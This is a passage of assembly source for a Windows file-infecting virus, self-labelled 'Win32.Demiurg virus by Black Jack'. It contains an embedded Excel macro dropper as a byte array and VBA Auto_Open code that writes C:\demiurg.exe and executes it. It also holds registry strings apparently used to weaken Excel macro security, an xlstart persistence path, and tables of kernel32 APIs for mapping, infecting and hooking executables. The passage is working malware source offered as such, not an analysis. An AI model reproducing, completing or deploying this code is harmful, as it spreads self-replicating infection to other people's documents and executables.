db 000h, 000h, 002h, 000h, 000h, 000h, 0E4h, 004h
db 000h, 000h, 01Eh, 000h, 000h, 000h, 001h, 0E6h
db 005h, 000h, 06Ch, 000h, 003h, 000h, 000h, 000h
db 06Ah, 010h, 008h, 000h, 00Bh, 0E6h, 007h, 000h
db 00Bh, 0E6h, 007h, 000h, 00Bh, 0E6h, 007h, 000h
db 00Bh, 0E6h, 007h, 000h, 01Eh, 010h, 000h, 000h
db 001h, 000h, 000h, 000h, 009h, 000h, 000h, 000h
db 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h
db 000h, 00Ch, 010h, 000h, 000h, 002h, 000h, 000h
db 000h, 01Eh, 000h, 000h, 000h, 009h, 000h, 000h
db 000h, 054h, 061h, 062h, 065h, 06Ch, 06Ch, 065h
db 06Eh, 000h, 003h, 000h, 000h, 000h, 001h, 0E6h
db 005h, 000h, 098h, 000h, 000h, 000h, 003h, 0E6h
db 007h, 000h, 020h, 000h, 000h, 000h, 001h, 000h
db 000h, 000h, 036h, 000h, 000h, 000h, 002h, 000h
db 000h, 000h, 03Eh, 000h, 000h, 000h, 001h, 000h
db 000h, 000h, 002h, 000h, 000h, 000h, 00Ah, 000h
db 000h, 000h, 05Fh, 050h, 049h, 044h, 05Fh, 047h
db 055h, 049h, 044h, 000h, 002h, 000h, 000h, 000h
db 0E4h, 004h, 000h, 000h, 041h, 000h, 000h, 000h
db 04Eh, 000h, 000h, 000h, 07Bh, 000h, 044h, 000h
db 039h, 000h, 045h, 000h, 034h, 000h, 036h, 000h
db 045h, 000h, 046h, 000h, 031h, 000h, 02Dh, 000h
db 046h, 000h, 031h, 000h, 033h, 000h, 041h, 000h
db 02Dh, 000h, 031h, 000h, 031h, 000h, 044h, 000h
db 033h, 000h, 02Dh, 000h, 041h, 000h, 035h, 000h
db 030h, 000h, 031h, 000h, 02Dh, 000h, 041h, 000h
db 036h, 000h, 046h, 000h, 033h, 000h, 044h, 000h
db 044h, 000h, 041h, 000h, 044h, 000h, 038h, 000h
db 032h, 000h, 033h, 000h, 039h, 000h, 07Dh, 0E6h
db 027h, 000h, 005h, 000h, 044h, 000h, 06Fh, 000h
db 063h, 000h, 075h, 000h, 06Dh, 000h, 065h, 000h
db 06Eh, 000h, 074h, 000h, 053h, 000h, 075h, 000h
db 06Dh, 000h, 06Dh, 000h, 061h, 000h, 072h, 000h
db 079h, 000h, 049h, 000h, 06Eh, 000h, 066h, 000h
db 06Fh, 000h, 072h, 000h, 06Dh, 000h, 061h, 000h
db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h
db 00Bh, 000h, 038h, 000h, 002h, 000h, 0E6h, 00Ch
db 0FFh, 0E6h, 024h, 000h, 0B1h, 000h, 000h, 000h
db 0A0h, 001h, 0E6h, 006h, 000h, 001h, 000h, 043h
db 000h, 06Fh, 000h, 06Dh, 000h, 070h, 000h, 04Fh
db 000h, 062h, 000h, 06Ah, 0E6h, 031h, 000h, 012h
db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h
db 000h, 0B8h, 000h, 000h, 000h, 068h, 0E6h, 04Bh
db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 074h, 000h, 0E6h
db 00Ch, 0FFh, 0E6h, 030h, 000h, 001h, 000h, 0FEh
db 0FFh, 003h, 00Ah, 000h, 000h, 0E6h, 004h, 0FFh
db 020h, 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h
db 006h, 000h, 046h, 01Ch, 000h, 000h, 000h, 04Dh
db 069h, 063h, 072h, 06Fh, 073h, 06Fh, 066h, 074h
db 020h, 045h, 078h, 063h, 065h, 06Ch, 020h, 038h
db 02Eh, 030h, 02Dh, 054h, 061h, 062h, 065h, 06Ch
db 06Ch, 065h, 000h, 006h, 000h, 000h, 000h, 042h
db 069h, 066h, 066h, 038h, 000h, 00Eh, 000h, 000h
db 000h, 045h, 078h, 063h, 065h, 06Ch, 02Eh, 053h
db 068h, 065h, 065h, 074h, 02Eh, 038h, 000h, 0F4h
db 039h, 0B2h, 071h, 0E6h, 0FFh, 000h, 0E6h, 0A5h
db 000h
macro_dropper_size EQU ($ - macro_dropper)
; ----- macro code ----------------------------------------------------------
;
; This is the macro code that will be stored in infected .xls files. It drops
; the PE EXE dropper as C:\demiurg.exe and executes it. This code is
; incomplete, the data of the dropper will be converted to VBA Array
; instructions at the time Excel is infected, and the full VBA code will be
; stored in the file C:\demiurg.sys then; this is the file that will be used
; to infect .xls files by the dropper
main_macro_code:
db "Attribute VB_Name = ""Demiurg""", 0Dh, 0Ah
db "Public a", 0Dh, 0Ah
db "Sub Auto_Open()", 0Dh, 0Ah
db "Open ""C:\demiurg.exe"" For Binary As #1", 0Dh, 0Ah
db "b", 0Dh, 0Ah
db "c", 0Dh, 0Ah
db "d", 0Dh, 0Ah
db "e", 0Dh, 0Ah
db "f", 0Dh, 0Ah
db "g", 0Dh, 0Ah
db "Close #1", 0Dh, 0Ah
db "t=Shell(""C:\demiurg.exe"",vbNormalFocus)", 0Dh, 0Ah
db "End Sub", 0Dh, 0Ah
db "Sub w()", 0Dh, 0Ah
db "For i=0 To 127", 0Dh, 0Ah
db "v$=Chr$(a(i))", 0Dh, 0Ah
db "Put #1,,v$", 0Dh, 0Ah
db "Next", 0Dh, 0Ah
end_sub:
db "End Sub", 0Dh, 0Ah
main_macro_code_size EQU ($ - main_macro_code)
sub_header:
sub_name EQU byte ptr ($ + 4)
db "Sub b()", 0Dh, 0Ah
regkey db "Software\Microsoft\Office\8.0\Excel", 0
office_version_number EQU byte ptr (offset regkey+26)
subkey_97 db "Microsoft Excel", 0
subkey_2K db "Security", 0
subkey_InstallRoot db "InstallRoot", 0
regvalue_options db "Options6", 0
regvalue_2K db "Level", 0
regvalue_path db "Path", 0
demiurg_xls db "\xlstart\demiurg.xls", 0
macro_filename db "C:\demiurg.sys", 0
kernel32_dll db "\kernel32.dll", 0
path_buffer1 db 260 dup(?)
path_buffer2 db 260 dup(?)
size_buffer dd 260
REG_SZ dd 1
regvalue_dword dd 0
reg_handle1 dd ?
reg_handle2 dd ?
dos_exe_size dd ?
resource_table dd ?
heap_buffer dd ?
dummy_dword dd ?
filename_ofs dd ?
attributes dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
filesize dd ?
filehandle dd ?
maphandle dd ?
mapbase dd ?
virus_RVA dd ?
virus_start dd ?
kernel32 dd 0
kernel32name db "KERNEL32", 0
GetModuleHandleA db "GetModuleHandleA", 0
l_GMH EQU $ - offset GetModuleHandleA
kernel32_API_names_table:
n_GlobalAlloc db "GlobalAlloc", 0
n_GlobalFree db "GlobalFree", 0
n_GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
n_GetSystemDirectoryA db "GetSystemDirectoryA", 0
n_lstrcatA db "lstrcatA", 0
n_LoadLibraryA db "LoadLibraryA", 0
n_CloseHandle db "CloseHandle", 0
n_GetFileSize db "GetFileSize", 0
n_GetFileTime db "GetFileTime", 0
n_SetFileTime db "SetFileTime", 0
n_SetEndOfFile db "SetEndOfFile", 0
n_SetFilePointer db "SetFilePointer", 0
n_CreateFileMappingA db "CreateFileMappingA", 0
n_MapViewOfFile db "MapViewOfFile", 0
n_UnmapViewOfFile db "UnmapViewOfFile", 0
n_WideCharToMultiByte db "WideCharToMultiByte", 0
; names of APIs that are both used and hooked
hooked_API_names_table:
n_CreateFileA db "CreateFileA", 0
n_GetFileAttributesA db "GetFileAttributesA", 0
n_SetFileAttributesA db "SetFileAttributesA", 0
n_CopyFileA db "CopyFileA", 0
n_MoveFileExA db "MoveFileExA", 0
; names of APIs that are only hooked and not used
n_MoveFileA db "MoveFileA", 0
n__lopen db "_lopen", 0
number_of_hooked_APIs EQU 7
kernel32_API_address_table:
GlobalAlloc dd ?
GlobalFree dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
lstrcatA dd ?
LoadLibraryA dd ?
CloseHandle dd ?
GetFileSize dd ?
GetFileTime dd ?
SetFileTime dd ?
SetEndOfFile dd ?
SetFilePointer dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
WideCharToMultiByte dd ?
CreateFileA dd ?
GetFileAttributesA dd ?
SetFileAttributesA dd ?
CopyFileA dd ?
MoveFileExA dd ?
number_of_kernel32_APIs EQU (($ - kernel32_API_address_table) / 4)
advapi32_dll db "ADVAPI32.dll", 0
advapi32_API_names_table:
n_RegOpenKeyExA db "RegOpenKeyExA", 0
n_RegCreateKeyExA db "RegCreateKeyExA", 0
n_RegQueryValueExA db "RegQueryValueExA", 0
n_RegSetValueExA db "RegSetValueExA", 0
n_RegCloseKey db "RegCloseKey", 0
advapi32_API_address_table:
RegOpenKeyExA dd ?
RegCreateKeyExA dd ?
RegQueryValueExA dd ?
RegSetValueExA dd ?
RegCloseKey dd ?
number_of_advapi32_APIs EQU (($ - advapi32_API_address_table) / 4)
imagehlp_dll db "IMAGEHLP.dll", 0
CheckSumMappedFile db "CheckSumMappedFile", 0
virus_end:
.code
dummy_host:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
caption db "Win32.Demiurg virus by Black Jack", 0
message db "First generation host", 0
end start